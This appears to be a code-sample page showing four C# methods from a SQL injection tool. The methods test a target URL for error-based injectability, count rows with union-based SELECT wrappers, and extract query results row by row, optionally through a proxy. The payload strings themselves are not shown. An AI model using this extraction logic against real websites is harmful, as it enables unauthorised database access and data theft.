Ejemplo n.º 1
        /// <summary>
        /// Requests one row of the configured custom query and returns the value
        /// extracted from the response page.
        /// </summary>
        /// <param name="startingFrom">
        /// Value passed as the second format argument of the single-result limiter template
        /// when <c>PayloadDetails.ExpectedResultType</c> is <c>Multiple</c>.
        /// </param>
        /// <returns>The answer produced by <c>HtmlHelpers.GetAnswerFromHtml</c> for the fetched page.</returns>
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            string rowPayload = PayloadDetails.Payload;

            // Fill every "{position}" placeholder with the data looked up for that parameter.
            bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
            if (hasParams)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    string placeholder = "{" + param.Position + "}";
                    rowPayload = rowPayload.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
                }
            }

            // Multi-row queries are wrapped in the DBMS-specific limiter so one row comes back per request.
            bool expectsManyRows = PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple;
            if (expectsManyRows)
            {
                var limiterTemplate = PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms);
                rowPayload = string.Format(limiterTemplate, rowPayload, startingFrom);
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, rowPayload);
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            string answer   = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            // TODO: strip scripts from the extracted answer.
            // NOTE(review): the answer is taken from the remote page and handed to
            // SaveToMappingFile unmodified; whether that helper escapes it is not visible
            // here, so treat mapping-file content as untrusted wherever it is read or rendered.
            bool shouldPersist = !string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(answer);
            if (shouldPersist)
            {
                XmlHelpers.SaveToMappingFile(
                    MappingFile,
                    PayloadDetails,
                    answer,
                    this,
                    (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
            }

            return answer;
        }
Ejemplo n.º 2
        /// <summary>
        /// Sends the <c>GeneralPayloads.ErrorBasedVictimIdentifier</c> probe to the configured URL
        /// and checks the extracted answer against the expected confirmation value.
        /// </summary>
        /// <returns>
        /// <c>true</c> only when the extracted answer is non-empty and equals
        /// <c>GeneralPayloads.ErrorBasedVictimConfirmationResult</c>; otherwise <c>false</c>.
        /// </returns>
        public bool TestIfVulnerable()
        {
            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier);
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            var    answer   = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            // An empty or missing answer never counts as a confirmation.
            if (string.IsNullOrEmpty(answer))
            {
                return false;
            }

            return answer == GeneralPayloads.ErrorBasedVictimConfirmationResult;
        }
Ejemplo n.º 3
        /// <summary>
        /// Determines how many rows the configured custom query is expected to return.
        /// </summary>
        /// <returns>
        /// 0 when no payload is configured, 1 when a single result is expected, otherwise the
        /// integer parsed from the response to the <c>GeneralPayloads.QueryResultCount</c> request
        /// (0 when the response cannot be parsed as an integer).
        /// </returns>
        public int GetTotalNoOfCustomQueryResultRows()
        {
            // Nothing to count without a payload.
            if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return 0;
            }

            // A single-result payload needs no round trip.
            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return 1;
            }

            string countPayload = PayloadDetails.Payload;

            // Fill every "{position}" placeholder with the data looked up for that parameter.
            bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
            if (hasParams)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    string placeholder = "{" + param.Position + "}";
                    countPayload = countPayload.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
                }
            }

            countPayload = string.Format(GeneralPayloads.QueryResultCount, countPayload);

            string query      = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, countPayload);
            string pageHtml   = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            string countText  = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            // The response text is remote-controlled; anything that is not an integer yields 0.
            int rowCount;
            if (!int.TryParse(countText, out rowCount))
            {
                rowCount = 0;
            }

            return rowCount;
        }
Ejemplo n.º 4
        /// <summary>
        /// Determines how many rows the configured custom query is expected to return,
        /// using the union-based result wrapper and the known column count.
        /// </summary>
        /// <returns>
        /// 0 when no payload is configured, 1 when a single result is expected, otherwise the
        /// integer parsed from the response (0 when the response cannot be parsed as an integer).
        /// </returns>
        /// <exception cref="SqlInjException">
        /// Thrown when the column information is missing and <c>TestIfVulnerable</c> returns <c>false</c>.
        /// </exception>
        public int GetTotalNoOfCustomQueryResultRows()
        {
            // Column information not available yet: run the check first.
            // NOTE(review): presumably TestIfVulnerable fills _nrCols, _nrVisibleCols and
            // _visibleColumnIndexes; that is not visible here, so confirm against its body.
            bool columnInfoMissing = _nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0;
            if (columnInfoMissing && !TestIfVulnerable())
            {
                throw new SqlInjException("Given script is not injectable using current injection strategy");
            }

            // Nothing to count without a payload.
            if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return 0;
            }

            // A single-result payload needs no further round trip.
            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return 1;
            }

            string countPayload = PayloadDetails.Payload;

            // Fill every "{position}" placeholder with the data looked up for that parameter.
            bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
            if (hasParams)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    string placeholder = "{" + param.Position + "}";
                    countPayload = countPayload.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
                }
            }

            countPayload = string.Format(GeneralPayloads.QueryResultCount, countPayload);

            StringBuilder columnList = new StringBuilder();
            columnList.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, countPayload);

            // Pad the remaining columns with their ordinal, each preceded by a comma.
            for (int column = 1; column < _nrCols; column++)
            {
                columnList.Append(",");
                columnList.Append(column.ToString());
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, columnList.ToString());
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            var countText   = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            // The response text is remote-controlled; anything that is not an integer yields 0.
            int rowCount;
            if (!int.TryParse(countText, out rowCount))
            {
                rowCount = 0;
            }

            return rowCount;
        }